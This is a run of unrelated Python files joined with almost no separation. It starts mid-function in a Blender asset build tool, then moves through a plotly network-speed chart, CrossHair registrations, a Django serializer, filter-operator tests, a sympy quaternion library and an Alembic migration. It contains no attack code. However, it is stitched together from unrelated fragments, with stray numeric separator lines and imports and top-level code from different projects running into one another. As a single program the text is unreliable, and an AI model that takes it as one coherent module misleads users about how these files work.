            dst = src.replace(srcdir, dstdir)
            # Skip any asset matching one of the ignore patterns.
            ignore_pattern = None
            for pattern in ignore_patterns:
                if fnmatch.fnmatch(asset, pattern):
                    ignore_pattern = pattern
                    break
            if ignore_pattern is not None:
                print('Skip building file {} that matched ignore pattern {}'.format(asset, ignore_pattern))
                continue
            if asset.endswith('.blend'):
                # NOTE(review): also first-occurrence replace; a directory
                # name containing '.blend' would be mangled here.
                dst = dst.replace('.blend', '.bam')
            # Skip outputs that are at least as new as their source.
            if os.path.exists(dst) and os.stat(src).st_mtime <= os.stat(dst).st_mtime:
                print('Skip building up-to-date file: {}'.format(dst))
                continue
            if asset.endswith('.blend'):
                # Handle with Blender
                num_blends += 1
            else:
                print('Copying non-blend file from "{}" to "{}"'.format(src, dst))
                if not os.path.exists(os.path.dirname(dst)):
                    os.makedirs(os.path.dirname(dst))
                shutil.copyfile(src, dst)
    if num_blends > 0:
        # Run Blender headless once for all blend files; pman_build.py runs
        # inside Blender and performs the actual conversion pass.
        blender_path = user_config.get('blender', 'last_path') if user_config.getboolean('blender', 'use_last_path') else 'blender'
        args = [
            blender_path,
            '-b',
            '-P',
            os.path.join(os.path.dirname(__file__), 'pman_build.py'),
            '--',
            srcdir,
            dstdir,
        ]
        #print("Calling blender: {}".format(' '.join(args)))
        subprocess.call(args, env=os.environ.copy())
    if hasattr(time, 'perf_counter'):
        etime = time.perf_counter()
    else:
        etime = time.time()
    print("Build took {:.4f}s".format(etime - stime))
def run(config=None):
    """Optionally rebuild assets, then launch the project's main file.

    The game process is spawned (not waited on) with the project directory
    as its working directory.
    """
    if is_frozen():
        raise FrozenEnvironmentError()
    config = config if config is not None else get_config()
    if config.getboolean('run', 'auto_build'):
        build(config)
    mainfile = get_abs_path(config, config.get('run', 'main_file'))
    print("Running main file: {}".format(mainfile))
    subprocess.Popen(
        [get_python_program(config), mainfile],
        cwd=config.get('internal', 'projectdir'),
    )
| 9,860 | 3,123 |
import sys
import plotly
import plotly.plotly as py
import plotly.graph_objs as go
#Argument 1 must be your plotly username, argument 2 is your api key. Get those by registering for a plotly account.
#Argument 3 is the name of the input file to input data from. Must be in the form: Date \n Download \n Upload \n
# NOTE(review): plotly.tools.set_credentials_file / plotly.plotly moved to
# the separate chart_studio package in newer plotly releases.
plotly.tools.set_credentials_file(username=sys.argv[1], api_key=sys.argv[2])
time = []
download = []
upload = []
# Records repeat in groups of three lines: date, download, upload.  The date
# line is replaced by a 1-based sample index used for the x axis.
# Bug fix: the input file was previously opened without ever being closed;
# the manual three-state lnum counter is replaced by a modulo cycle.
with open(sys.argv[3], 'r') as infile:
    for lineno, line in enumerate(infile):
        field = lineno % 3
        if field == 0:
            #time.append(line[11:13])
            time.append(lineno // 3 + 1)
        elif field == 1:
            # Slice the numeric download speed out of the report line.
            download.append(line[10:15])
        else:
            # Slice the numeric upload speed out of the report line.
            upload.append(line[8:12])
# Earlier histogram-based version of the chart, kept for reference:
#trace1 = go.Histogram(
#    x=time,
#    y=download,
#    opacity=0.75
#)
#trace2 = go.Histogram(
#    x=time,
#    y=upload,
#    opacity=0.75
#)
#data = [trace1, trace2]
#layout = go.Layout(barmode='overlay')
#fig = go.Figure(data=data, layout=layout)
#py.iplot(fig, filename='Network Speed Graph')
# Grouped bar chart: one download and one upload bar per sample index.
trace1 = go.Bar(
    x=time,
    y=download,
    name='Download Speed'
)
trace2 = go.Bar(
    x=time,
    y=upload,
    name='Upload Speed'
)
data = [trace1, trace2]
layout = go.Layout(
    barmode='group'
)
fig = go.Figure(data=data, layout=layout)
# Uploads the figure to the configured plotly account.
py.iplot(fig, filename='Network Speed Graph')
| 1,326 | 569 |
from crosshair.libimpl import builtinslib
from crosshair.libimpl import collectionslib
from crosshair.libimpl import datetimelib
from crosshair.libimpl import mathlib
from crosshair.libimpl import randomlib
from crosshair.libimpl import relib
def make_registrations():
    """Install CrossHair's intercepts for every supported stdlib module."""
    registered_modules = (
        builtinslib,
        collectionslib,
        datetimelib,
        mathlib,
        randomlib,
        relib,
    )
    # Iteration order mirrors the original explicit call sequence.
    for module in registered_modules:
        module.make_registrations()
import re
from django.urls import reverse
from rest_framework import serializers
from schedulesy.apps.ade_legacy.models import Customization
class CustomizationSerializer(serializers.ModelSerializer):
    """Serializer for Customization exposing the related local configuration."""
    configuration = serializers.SerializerMethodField()

    class Meta:
        model = Customization
        fields = '__all__'

    def to_internal_value(self, data):
        """Carry an incoming dict 'configuration' payload through validation."""
        d = super().to_internal_value(data)
        # Bug fix: the original `type(data['configuration'] == dict)` computed
        # the type of a boolean (always truthy) instead of checking the
        # payload's type; isinstance() performs the intended dict check.
        if 'configuration' in data and isinstance(data['configuration'], dict):
            d['configuration'] = data['configuration']
        return d

    def get_configuration(self, obj):
        """Return the linked local customization's configuration, or {} if none."""
        lc = obj.local_customization
        return lc.configuration if lc else {}
"""
Test Filter Operator
"""
import os
import sys
# Make the package importable when the test is run from its own directory.
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from gva.flows.operators import FilterOperator
# Pretty tracebacks when `rich` is available; it is an optional dependency.
try:
    from rich import traceback
    traceback.install()
except ImportError:
    pass
def test_filter_operator_default():
    """A FilterOperator with no condition passes records through unchanged."""
    payload = {'a': 1}
    operator = FilterOperator()
    data, context = operator.execute(payload)
    assert data == payload
def test_filter_operator():
    """Records failing the condition become None; passing ones survive."""
    def is_even(record):
        return record.get('value') % 2 == 0

    rows = [{"value": v} for v in (1, 2, 3, 4)]
    op = FilterOperator(condition=is_even)
    results = [op(row) for row in rows]
    assert results[0] is None
    assert results[1] == ({'value': 2}, {})
    assert results[2] is None
    assert results[3] == ({'value': 4}, {})
# Allow running this module directly as a quick smoke test.
if __name__ == "__main__":
    test_filter_operator_default()
    test_filter_operator()
    print('okay')
# -*- coding: utf-8 -*-
"""
Created on Tue May 25 10:24:05 2021
@author: danaukes
https://en.wikipedia.org/wiki/Rotation_formalisms_in_three_dimensions
https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation
https://en.wikipedia.org/wiki/Conversion_between_quaternions_and_Euler_angles
"""
import sympy
sympy.init_printing(pretty_print=False)
from sympy import sin,cos,tan,pi,acos
import numpy
def array(input1):
    """Build a sympy Matrix from *input1* (numpy backend kept for reference)."""
    # return numpy.array(input1)
    return sympy.Matrix(input1)


def cross(a, b):
    """Cross product delegated to the operand (sympy Matrix .cross)."""
    # return numpy.cross(a,b)
    return a.cross(b)


def dot(a, b):
    """Dot product delegated to the operand."""
    return a.dot(b)
class Quaternion(object):
    """A quaternion e0 + e1*i + e2*j + e3*k over numeric or sympy scalars."""

    def __init__(self, e0, e1, e2, e3):
        # Components stored scalar-first: [e0, e1, e2, e3].
        self.e = [e0, e1, e2, e3]

    @classmethod
    def build_from_axis_angle(cls, theta, x, y, z):
        """Quaternion for a rotation of *theta* about the axis (x, y, z)."""
        e0 = cos(theta/2)
        s = sin(theta/2)
        return UnitQuaternion(e0, s*x, s*y, s*z)

    def norm(self):
        """Euclidean norm of the 4-component vector."""
        return self.norm_squared()**.5

    def norm_squared(self):
        """Sum of squared components (a sympy expression for symbolic input)."""
        e = sympy.Matrix(self.e)
        return sum([item**2 for item in e])

    def __mul__(self, other):
        """Hamilton product; int/float scalars are promoted to (s, 0, 0, 0)."""
        if type(other) in [int, float]:
            other = Quaternion(other, 0, 0, 0)
        return self.hamilton_product(other)

    def __truediv__(self, other):
        """Division by a scalar: multiply by its reciprocal.

        ``1/other`` also works for sympy scalars (used by ``inv``); dividing
        by another Quaternion remains unsupported and raises TypeError, as
        in the original (whose if/else branches were duplicates).
        """
        return self.hamilton_product(Quaternion(1/other, 0, 0, 0))

    def __str__(self):
        e = []
        for item in self.e:
            # Numeric components get 3 decimal places; symbols print as-is.
            if type(item) in [int, float]:
                a = '{0:.3f}'.format(item)
            else:
                a = str(item)
            e.append(a)
        return 'Q({0},{1},{2},{3})'.format(*e)

    def __repr__(self):
        return str(self)

    def hamilton_product(self, other):
        """Return self*other using the Hamilton product formula."""
        a0, a1, a2, a3 = self.e
        b0, b1, b2, b3 = other.e
        e0 = a0*b0 - a1*b1 - a2*b2 - a3*b3
        e1 = a0*b1 + a1*b0 + a2*b3 - a3*b2
        e2 = a0*b2 - a1*b3 + a2*b0 + a3*b1
        e3 = a0*b3 + a1*b2 - a2*b1 + a3*b0
        return Quaternion(e0, e1, e2, e3)

    def scalar(self):
        """Scalar (real) part.

        Bug fix: the original read the nonexistent attribute ``self.e0``
        and always raised AttributeError.
        """
        return self.e[0]

    def vector(self):
        """Vector (imaginary) part as a 3-element matrix."""
        return array(self.e[1:])

    def conjugate(self):
        """Negate the vector part; preserves the concrete subclass."""
        return type(self)(self.e[0], -self.e[1], -self.e[2], -self.e[3])

    def inv(self):
        """Multiplicative inverse: conjugate divided by the squared norm."""
        return self.conjugate()/self.norm_squared()

    def unit(self):
        """Return the normalized quaternion as a UnitQuaternion."""
        result = self/self.norm()
        return UnitQuaternion(*result)

    def rotate_by(self, q):
        """Return this quaternion rotated by the unit quaternion *q*."""
        return q.rotate(self)

    def sum(self, other):
        """Component-wise sum with *other*."""
        return Quaternion(*[a + b for a, b in zip(self.e, other.e)])

    def expand(self):
        """Symbolically expand each component (sympy)."""
        e = sympy.Matrix(self.e)
        return Quaternion(*(e.expand()))

    def conjugation(self, other):
        """Return other * self * other**-1 (conjugation by *other*)."""
        return other*self*other.inv()

    def __getitem__(self, index):
        # Integer and slice indexing both defer to the component list.
        if isinstance(index, (int, slice)):
            return self.e[index]

    def __setitem__(self, index, v):
        if isinstance(index, int):
            self.e[index] = v
        elif isinstance(index, slice):
            # Bug fix: the original slice branch wrote to the nonexistent
            # attribute ``self.list``; the component list is ``self.e``.
            if isinstance(v, Quaternion):
                self.e[index] = v.e
            elif isinstance(v, list):
                self.e[index] = v
            else:
                raise(Exception())

    def __iter__(self):
        for item in self.e:
            yield item

    def __len__(self):
        return len(self.e)
class UnitQuaternion(Quaternion):
    """Quaternion assumed to have unit norm, representing a 3D rotation."""

    @classmethod
    def build_from_axis_angle(cls, theta, x, y, z):
        """Unit quaternion rotating by *theta* about axis (x, y, z).

        Unlike the base-class version, this honors *cls*, so subclasses
        construct instances of themselves.
        """
        e0 = cos(theta/2)
        s = sin(theta/2)
        e1 = s*x
        e2 = s*y
        e3 = s*z
        return cls(e0, e1, e2, e3)

    def hamilton_product(self, other):
        """Hamilton product; stays a UnitQuaternion only when *other* is one
        too (unit quaternions are closed under multiplication)."""
        result = super(UnitQuaternion, self).hamilton_product(other)
        if isinstance(other, UnitQuaternion):
            result = UnitQuaternion(*result)
        return result

    def rotate(self, other):
        """Rotate *other* (a length-3 sequence or a quaternion) by self.

        A 3-element input is promoted to a pure quaternion, conjugated,
        and the 3-vector part is returned.
        """
        l = len(other)
        if l == 3:
            other = Quaternion(0, *other)
        result = other.conjugation(self)
        if l == 3:
            result = result.vector()
        # NOTE(review): for l == 3, `other` was just rebuilt above as a plain
        # Quaternion, so this branch can only trigger for quaternion input.
        if isinstance(other, UnitQuaternion):
            return UnitQuaternion(*result)
        else:
            return result
        # q = self
        # t = 2*cross(q.vector(),v.vector())
        # new = v.vector()+q.e[0]*t+cross(q.vector(),t)
        # new = Quaternion(sympy.Number(0),*new)
        # return new

    def inv(self):
        """For a unit quaternion the inverse equals the conjugate."""
        return self.conjugate()

    def unit(self):
        """Already unit by assumption; return self."""
        return self
class VectorQuaternion(Quaternion):
    """A pure quaternion: zero scalar part plus a 3-vector."""
    def __init__(self, e1, e2, e3):
        Quaternion.__init__(self, 0, e1, e2, e3)
import sympy  # redundant re-import (already imported above) but harmless
# Symbolic components for a generic quaternion and a generic rotation.
a,b,c,d = sympy.symbols('a,b,c,d')
e,f,g,h = sympy.symbols('e,f,g,h')
q = sympy.Symbol('q')  # NOTE(review): immediately shadowed by the UnitQuaternion below
v1 = Quaternion(a,b,c,d)
v12 = [b,c,d]
q = UnitQuaternion(e,f,g,h)
# q = Quaternion.build_from_axis_angle(q, 0,0,1)
# v1 = Quaternion(0,2,3,4)
# Demo: rotate v1 in three equivalent ways (method, explicit conjugation,
# and rotating the bare 3-vector).
v2 = v1.rotate_by(q)
v22 = q*v1*q.inv()
v3 = q.rotate(v12)
| 5,620 | 2,166 |
"""Adds voice category per channel
Revision ID: 6e982c9318a6
Revises: ef54f035a75c
Create Date: 2021-12-03 13:18:57.468342
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "6e982c9318a6"       # this migration
down_revision = "ef54f035a75c"  # parent migration in the chain
branch_labels = None
depends_on = None
def upgrade():
    """Add the nullable per-channel voice_category column with its default."""
    voice_category = sa.Column(
        "voice_category",
        sa.String(length=50),
        nullable=True,
        # Server-side default so existing rows pick up the standard category.
        server_default=sa.text("'SpellBot Voice Channels'"),
    )
    op.add_column("channels", voice_category)


def downgrade():
    """Remove the per-channel voice_category column."""
    op.drop_column("channels", "voice_category")